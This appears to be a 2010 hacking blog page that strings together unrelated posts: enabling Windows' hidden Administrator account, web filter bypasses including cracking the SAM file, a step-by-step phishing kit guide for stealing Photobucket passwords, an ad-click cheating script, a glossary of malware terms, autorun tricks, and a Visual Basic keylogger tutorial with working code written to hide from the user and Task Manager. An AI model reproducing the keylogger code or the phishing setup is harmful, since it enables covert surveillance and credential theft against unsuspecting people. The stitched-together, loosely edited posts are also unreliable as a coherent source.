Saturday, August 21, 2010

Enable the (Hidden) Administrator Account on Windows 7 or Vista

Many people familiar with prior versions of Windows are curious what happened to the built-in Administrator account that was always created by default. Does this account still exist, and how can you access it?

The account is created in Windows 7 or Vista, but since it’s not enabled you can’t use it. If you are troubleshooting something that needs to run as administrator, you can enable it with a simple command.

Note: You really shouldn’t use this account for anything other than troubleshooting. In fact, you probably shouldn’t use it at all.

Enable Built-in Administrator Account

First you’ll need to open a command prompt in administrator mode by right-clicking and choosing “Run as administrator” (or use the Ctrl+Shift+Enter shortcut from the search box)

Run Command Prompt as AdministratorNow type the following command:

net user administrator /active:yes

The Command Completed Successfully You should see a message that the command completed successfully. Log out, and you’ll now see the Administrator account as a choice. (Note that the screenshots are from Vista, but this works on Windows 7 too)

Administrator AccountYou’ll note that there’s no password for this account, so if you want to leave it enabled you should change the password.

Disable Built-in Administrator Account

Make sure you are logged on as your regular user account, and then open an administrator mode command prompt as above. Type the following command:

net user administrator /active:no

The Command Completed SuccessfullyThe administrator account will now be disabled, and shouldn’t show up on the login screen anymore

How to Bypass all Webfilters

There are times when when we are forced to use proxy and we know , with proxy many sites are blocked, But here is a way to bypass all the Web filters. When a site is blocked , you can use this method to bypass the block!

Lets pretend for a moment that the Internet is made up of 26 websites, A-Z. The web filter blocks your browser from accessing sites X-Z, but not sites A-W. Simply make the browser think you’re going to A-W. There are a variety of ways to do this:

Proxy Servers:

This is a list of HTTP proxies. These sites may not be up forever, so you may need to search for “free HTTP proxy” or “public proxy servers” or other similar terms.
Proxy server lists:


Now that you have a list of proxies, you would open IE (internet explorer) and click on Tools > Internet Options > Connections > LAN Settings > Advanced. Enter the address and port of one of the servers from the list in the proper area (http) and make sure the “use a proxy server for your LAN” option is selected. Remember to replace the proxy and port at your terminal to the original when you’re done.

Note: Some proxies listed may not work, and this method may decrease your surfing speed. By trying various entries, you’ll find one that works, or works faster.

The infamous translation trick:

Go to a web page translation site and use their services to “translate a page to English” thus accessing the blocked page through their trusted site.

You’ll notice that several translation sites are blocked, but by using less popular ones, this method can still be effective. Here is a list of some translation services. Again, these sites may not be up forever, so you may need to search for them.


URL Scripting:

URL scripting is the easiest method. It works on a select few web filters and is based on the same principal as the translation trick. By typing and address like the filter will not go into effect as it recognizes the trusted site (in this case

Other tricks:

Simply open the command prompt and type:

Ping ? obviously being the restricted site

At this point you can take down the IP address (ex. and enter it into the browser. If access to the command prompt is also restricted, see “How to bypass restrictions to get to thecommand prompt.” If this article has been taken from information leak, then know that it involves anything from opening the browser, selecting view > source, then saving it as X.bat and opening it to opening a folder or browser and typing in the location of cmd.exe depending on the OS. I will not go into further, as this a completely different topic.

Use referring to it as a secured site may confuse the filter.

Note: These are ancient methods that many new filters defend against, but still may be applicable in your situation. If not, a little history never hurt anyone.

Web based Proxies:

Another one of the easier, yet effective methods include web based proxies. These are simple in the fact that you just enter the restricted address and surf! Some of these have some restrictions, like daily usage limits, etc but you can also use another proxy (perhaps one that sucks, like a text only) to bypass their restrictions as well. Here is a list of some:


Proxy Programs:

There are many proxy programs that allow you to surf anonymously that are more or less based on the same topics we’ve covered here. I’ve added them just to cover the topic thoroughly:

 ? toolbar that requires admin rights to install

Making your own CGI proxy server:

Making your own proxy server may come in handy, but I personally find that simply uploading a .txt file/w a list of proxies to a free host makes for a much easier and headache free solution. If you don’t know PERL, there is code out there to help you set it up. Check out these sites for more info:


Admin Access:

When all else fails, you can simply take over the PC and alter or delete the damn filter. This method varies according to the OS (operating system) you are dealing with. Please see “Hacking Windows NT” for more information. If this tutorial has been taken from information leak, then I will go as far as to say it involves booting the PC in another OS, copying the SAM file and cracking it using a program like saminside or LC5 rather than start a whole new topic within one.

How To Hack Someone’s Photobucket Account

i decided to prepare a tutorial to help myYou to get an easy way to hack photo bucket. All can just take a glance of the tutorial.

Photobucket is an image hosting, video hosting, slideshow creation and photo sharing website. It was founded in 2003 by Alex Welch and Darren Crystal and received funding from Trinity Ventures.[1][2] It was acquired by Fox Interactive Media in 2007.

Photobucket is usually used for personal photographic albums, remote storage of avatars displayed on internet forums, and storage of videos. Photobucket’s image hosting is often used for eBay, MySpace (now a corporate cousin), Bebo, Neopets and Facebook accounts, LiveJournals, Open Diarys, or other blogs, and message boards. Users may keep their albums private, allow password-protected guest access, or Open them to the public.
As being the most popular image hosting site,it is being a target of many hackers,so today i will tell you a method How to hack hack a photobucket account

How to hack photobucket account – Method
There are two methods to hack a photobucket account:


Today we i will tell you how to hack a photobucket account with phishing:
What is phishing?
Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public,Phishing is one of the most easiest way to hack someones photobucket account.

Steps to hack a photobucket account using phisihng:

1.First of all download:Photobucket fake login page
2.Now extract files into a folder

3.Now open index.htm in a wordpad

4.Now search for a term “form action=” you will see something like this action=”yourloginscript.php”

5.Change this term to the name of your login script. i.e next.php or the name of your login script

6.Now save all changes
7.Now make an account on a free hosting site such as, or 110mb and upload all the three files i.e index.htm,next.php and passw0rds.txt

8.Now check your fake login page by typing somewords in your photobucket fake login page you will see those words in a file called passw0rds.txt

Hack and browse ads

Hey guys,

In this post i will show you how to hack By using thi steps You can click moree ads and i promise you that you will not get banned i tried it myself and hence it works fine for me and now you try it and dont forget to comment abount this and this is an 100% working trick so try it now or else will fix it up Ok now read the tutorial and Enjoyy MAking Money Online I request you to kindly refer me i have given You my referal link below Read And Enjoy…

Step 1

Of course you need to register .

It’s free and you loose nothing ! (Anyway it’s up to you)

Step 2

Install Greasemonkey Plugin then restart Firefox.

Step 3

Install Bux : Browse Ads script for Greasemonkey (by w35l3y).

Step 4

Thats’it ! You are almost done just login and click on Surf Ads in your main menu.
Then the script will automatically launch and Browse Ads :
Now you just have to log-in daily on and Voila !
This hack is really stealth ! You can’t be ban.

Free Airtel GPRS Using UCWEB 100% Works

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I am here with the most credible trick for Free GPRS in Airtel with UCWEB. Previously we had a TeaShark application that was awesome with great speed and perfect for browsing, but unfortunately the trick no longer works most of the regions. And your are the lucky one if that still works for you without costing any bucks.

The world of software and hacks is always open for Airtel because it took about six months for Airtel guys to figure out the TeaShark problem and fix it out. But now its another software to replace TeaShark thats UCWEB.

UCWEB is a web browser for mobile devices such as mobile phones. UCWEB is now ranked #1 in the Chinese mobile web browser market. UCWEB just works really fine with Airtel Network and its just free. UCWEB just works fine with Airtel Live costing you nothing.

Link : Download UCWEB for Mobile

If you have any other working tricks then post your comments here. Let me know if this trick is work for you.

What is Adware and what does it do ?

Adware is one of many “malwares” or malicious software programs that are unknowingly installed on your computer when you visit online sites and download freebies. When you use share files or visit sites with free downloads of wallpaper, videos, or music, some of these sites will send along adware software with your download.

These malwares are a rapidly growing threat to all computer systems. It is estimated that in the first three months of 2005 over 80% of computer users had some type of malware software program running on their computer, without their knowledge.

Although it is much less a threat to your computer and information than spyware is, what adware will do is cause pop up banners and advertisements to appear on your computer. These advertisements are displayed on your computer no matter what program you might be using. What the people who place this type of nuisance software on you computer say is that adware advertising helps them to recover costs and allows them to offer you those freebies you want.

What you want to do to stop adware from appearing on your computer is to first run an anti-adware program. Run this program on demand regularly. Along with an anti-adware software program run your regular computer virus scan on demand also.

Check the security level on your computer. You security level setting should be at least medium to help protect you from unwanted downloads.

Do not download free files from the internet, period. When downloading any software read the end-user license agreement. Some of these agreements will state that when you download their software you are also agreeing to accept a downloaded spyware that may be placed on your computer at the same time.

Be aware of threats to your computer, and your personal information

To get protection from these kinds of threats you can try softwares like


Good luck !

Hacking Terminology-Guide for Complete Noobs

This is a little tutorial ive written for complete noobs who don’t know anything about hacking, or for those who need help understanding the terminology.

Bot - A bot is a program that is ran secretly in the background of a customer’s computer. The bot connects to an IRC channel usually where a Bot Herder(its creator) can use a number of commands to control these computers that are now it’s under control. A zombie computer(a pc under control of a bot herder) can be manipulated in a number of ways. Some functions of a bot include stealing customers passwords, Password Recovery Tool, ddosing a server to cause it to crash, turning on the webcam and being able to watch the zombie computer’s users, visiting a website(to gain money + traffic for a bot herder), clicking ads, making ads appear randomly, destroying itself(the pc), and sending spam to email contacts.

serverNET – A bunch of bot’s connected to a server (usually IRC or web) that can be controlled and manipulated by its owner.

RAT (Remote Administration Tool) – Sort of like a serverNET in regards that you can gain acess to the customers computer and do stuff like look at their files, webcam, etc. Only this malware connects back to you, apposed to a server.

Crypter – A crypter is used to make well known hacker’s viruses (such as keyloggers and botnets) undetectable by anti-virus software by changing the virus program signatures that anti virus programs have in their databases to make them easier to spread.

Binder – A binder is used to bind a virus(such as a Password Recovery Tool,etc) to another program making it undetechtable and able to fool users into thinking its something else. (IE a customer will click an installPhotoshop.exe and it will install photoshop as well as your virus secretly.)

FUD – Term for fully undetectable virus. (made by either coding your own virus or by crypting and binding an existing virus) Use (uncheck distribute sample) to check if your virus is undetectable.

Database – Used by most websites to store things such as User names, Passwords, Email, etc of an entire website or community.

SQL Injection – A way of manipulating a website’s forms as a way of retrieving it’s databases. This can be used to find users and passwords as well as obtaining admin on a website in order to deface it.

XSS (Cross Site Scripting) – a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. (From Wikipedia)

Password Recovery Tool – A Password Recovery Tool is a program, usualy ran secretly in the background that records what users type, then the typed output is usually sent via email or uploaded by the Password Recovery Tool somewhere to the web in secret. These can be attached to other executables so you never even know you ran them in the first place, once you click it once it often is started at startup from their on.

Cookie Stealing/Spoofing – Used to fool a customer into clicking a link that will steal their cookies to websites which you can then use to have their privileges to various parts of a website or forum.

BruteForcer – Program used to crack passwords by trying every password/password list on various forms.

Hashes - How passwords are usually stored, this is a way of crypting a password so it is not plain text, harder passwords are very hard to crack but simple ones have often been cracked and can be found on online databases. Some common password hashes include MD5 and SHA.

Social Engineering – Tricking a customer into doing something you want them to do by disguising or enticing them into doing what you want.

Phishing - Creating a fake login page to a well known website (IE Facebook) and then fooling a customer into entering their information on the fake login page through social engineering.

How To Create Autorun.inf For Pendrive – Autoplay Your Tools

When you plug-in your pen drive then its really useful to run an Autorun software it can consist of anything from hacking software to any music player.

Its really useful as you can do your work in seconds and in hacking stuff it its really important to boot up fast so that you can do your work in seconds and no body catches you rather then first loading the pen drive then navigating to the folders and then doing it. isn’t it

So its really worthwhile to take a look at the way the windows Xp looks at the pen drive auto run program rather then making a program that’s loading automatically written C.

Ok that’s the image to notify you that you a need a pen drive and a windows Xp based computer with you so as you can perform this hack

So lets start…

How to create a Autorun.inf file ?

Its the most simple part of it.

1. To create an autorun file
2. Open Notepad and save ‘autorun.inf’’ (with quotes)
3. Save it to the root of the drive.

All it needs to have is in the first line


It was easy right

How To Changing Icon of Pendrive

1. To create an autorun file
2. Open Notepad and save ‘autorun.inf’’ (with quotes)
3. Save it to the root of the drive.
4. Then Type -


Save it and remember in the root directory

How To New Option Appear in the Autorun Menu

1. To create an autorun file
2. Open Notepad and save ‘autorun.inf’’ (with quotes)
3. Save it to the root of the drive.
4. Then Type -


Save it and exit. Once again, the program has to be in the root. Now, when you plug it in, the option should appear in the menu.

How To Run Programs Automatically When USB is Plugged In

1. To Create an autorun file
2. Open Notepad and save ‘autorun.inf’’ (with quotes)
3. Save it to the root of the drive.
4. Then Type -


Well That’s it, it was easy right, now take a look at this

Hell i need that pen drive that’s awesome. just take a look at this anybody would think that its a useless damaged usb kit or something but its a pendrive search on google you would find it .

Make Your Own keylogger

In this post iam gng to show You How to Make your Own keylogger ,Making A keylogger is not That much tough TThis tutorial demonstrates how to make your keylogger easily…

Intro: What a Keylogger is made of

Before we start programming, we need to answer a basic question: what is a keylogger? As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (keyboard buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer. A keylogger is also running (working) on this computer. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that our keylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.


Basic Concepts: What needs to be achieved


Ok, now lets plan our program, what should such keyloger do and what it should not. Significant difference to previous section is in the sense that here we shall discuss the LOGIC, the instructions that our program will follow.

Keylogger will:

1 – listen to all the key strokes of the user.

2 – save these keys in a log file.

3 – during logging, does not reveal its presence to the user.

4 – keeps doing its work as long as the used is logged on regardless of users actions.


Implementation: Converting logic into code


We shall use Visual Basic because it is much easier and simple to understand comparing to C++ or Java as far as novice audience is concerned. Although programmers consider it somewhat lame to code in VB but truthfully speaking, its the natural language for writing hacking/cracking programs. Lets cut to the chase – start your VB6 environment and we are ready to jump the ride!

We need a main form, which will act as HQ to the program.

First of all, as our program shall run, we need to make sure it is hidden. This should be very simple to accomplish:

Private Sub Form_Load()

Me.Visisble = False

End Sub

This makes our program invisible to the human eye. To make it invisible to computers eye too, we need to add this line in the Form_Load() event App.TaskVisible = False . This enabled our logger to run in stealth mode and the regular Task Manager will not see our application. Although it will still be possible to see it in the processes tab, there are “ways” to make it hidden. Figure them out yourself, they have nothing to do with programming.

OK, now that our program has run in stealth mode, it should do its essential logging task. For this, we shall be using a whole load of API. These are the interfaces that the Application Platform (windows) itself provides us in those annoying dll files.

There are 3 methods to listen for keys:

* GetAsyncKeyState

* GetKeyboardState

* Windows Hooks

Althought the last method is easier to use, this will not work on Windows98 and also it is NOT very precise. Many people use it, but as my experiences revealed, Keyboard Hooks are only a good way of blocking keys and nothing else. The most exact and precise method in my experience is GetAsyncKeyState().

So lets use this function, but where is that damn thing and how to use it?

Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer

This is how we use a function already present in a dll file. In this case we are using the user32.dll and the function we are using is GetAsyncKeyState(). The arguments (Long vKey), and return value (Long) shall be discussed later, right now its enough to know that this function can listen to keystrokes.

What we need next is to run this function infinitely (as long as the system is running). To do this, just put a Timer control on the form and name it tmrTimer. This timer is used to run the same line of code forever. Note that a while loop with a universally true condition would also accomplish same, but the while loop will certainly hang the system and will lead to its crash as opposed to timer. Timer will not hang the system at all because a while loop tends to carry out the instruction infinitely WITHOUT any break and it also keeps the control to itself, meaning that we cannot do any other job as the loop is running (and with a universally true statement, the while loop will not let the control pass to ANYWHERE else in the program making all the code useless) while the Timer control just carries out the instuction after a set amount of time.

So the two possibilities are:

Do While 1=1

‘our use of the GAKS (GetAsyncKeyState) function Loop


Private Sub tmrTimer_Timer()

‘our use of the GAKS function

End Sub

Timer being set, lets move on to see how the GAKS function works and how are we going to use it. Basically what the GAKS function does is that it tells us if a specific key is being pressed or not. We can use the GAKS function like this: Hey GAKS() check if the ‘A’ key is being pressed. And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some flamboyant 007 style

If GAKS(65)<>0 Then

Msgbox “The ‘A’ key is being pressed”


Msgbox “The ‘A’ key is not being pressed”

End If

Now lets see how this code works: GAKS uses ASCII key codes and 65 is the ASCII code for ‘A’ If the ‘A’ key is being pressed then GAKS will return a non-zero value (often 1) and if the key is not being pressed then it will return 0. Hence If GAKS(65)<>0 will be comprehended by the VB compiler as “If the ‘A’ key is being pressed”.

Sticking all this stuff together, we can use this code to write a basic functional keylogger:

Private Sub tmrTimer_Timer()

Dim i As Integer

Static data As String

For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’

If GAKS(i)<>0 Then data = data & Chr(i)

Next i

If GAKS(32) <> 0 Then data = data & ” ” ‘checking for the space bar

If Len(data)>=100 Then

Msgbox “The last 100 (or a couple more) are these ” & VBNewLine & data

data = “”

End If

End Sub

This alone is enough to create a basic functioning keylogger although it is far from practical use. But this does the very essential function of keylogger. Do try it and modify it to your needs to see how GAKS works and how do the Timer delays affect the functionality of a keylogger. Honestly speaking, the core of our keylogger is complete, we have only to sharpen it now and make it precise, accurate and comprehensive.

The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a key pressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it. We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has been pressed for a specified amount of time. For this, we need a whole array of counters. So open your eyes and listen attentively.

Dim count(0 to 255) As Integer

This array is required for remembering the time count for the keys. i.e. to remember for how long the key has been pressed.

Private Sub tmrTimer_Timer()

Dim i As Integer

Const timelimit As Integer = 10

Static data As String

For i=0 To 255 ‘for all the ASCII codes

If GAKS(i)<>0 Then

If count(i) = 0 Then ‘if the key has just been pressed

data = data & Chr(i)

ElseIf count(i) < timelimit Then

count(i) = count(i) + 1 ‘add 1 to the key count


count(i) = 0 ‘initialize the count

data = data & Chr(i)

End If

Else ‘if the key is not being pressed

count(i) = 0

End If

Next i

End Sub

What we have done here is that we have set a time limit before the GAKS function will tell us that the key is being pressed. This means, in simple words, that if we press and hold the ‘A’ key, the GAKS function will not blindly tell us the ‘A’ key is being pressed, but it will wait for sometime before telling us again that the key is being pressed. This is a very important thing to do, because many users are not very fast typists and tend to press a key for somewhat longer than required.

Now what is left (of the basic keylogger implementation) is just that we write the keys to a file. This should be very simple:

Private Sub timrTimer_Timer()

‘do all the fuss and listen for keystrokes

‘if a key press is detected

Open App.Path & “\logfile.txt” For Append As #1

Print #1, Chr(keycode);

Close #1

End Sub

Note that this is the very basic concept of writing a keylogger, we have yet not added autostart option and neither have we added an post-compile functionality edit options. These are advanced issues for the beginners. If you would like me to write about them, do tell me and I will write about them too, step by step. Please do comment on this article, telling me what it lacks and what was not required in it. Feel free to post this anywhere you like, just make sure you don’t use it for commercial purposes. If you have any questions about any part of it let me know and I will try to answer.

Fake Virus prank program for real fun

Virus on computer can easily make it do some strange things with different pop-up errors, blue screen of death and nasty error messages on black screen. This for sure is scary for any Windows user. How about faking all this for real fun with friends? This is possible using “The Ultimate Virus” fake prank program.

Just download, unzip and double click to launch this ultimate virus prank program. First screen has 3 options: format hard disk, delete windows folder, delete all contents of disk. Select either of not so comforting option and see the fake virus fun play on the computer. This follows blue screen of death with heavy loaded errors on black screen.

There is no way to exit, after few minutes of fun you get comforting button to exit this prank application. Get dose of fake virus fun which looks all real to surprise friends with The Ultimate Virus prank program. Have fun!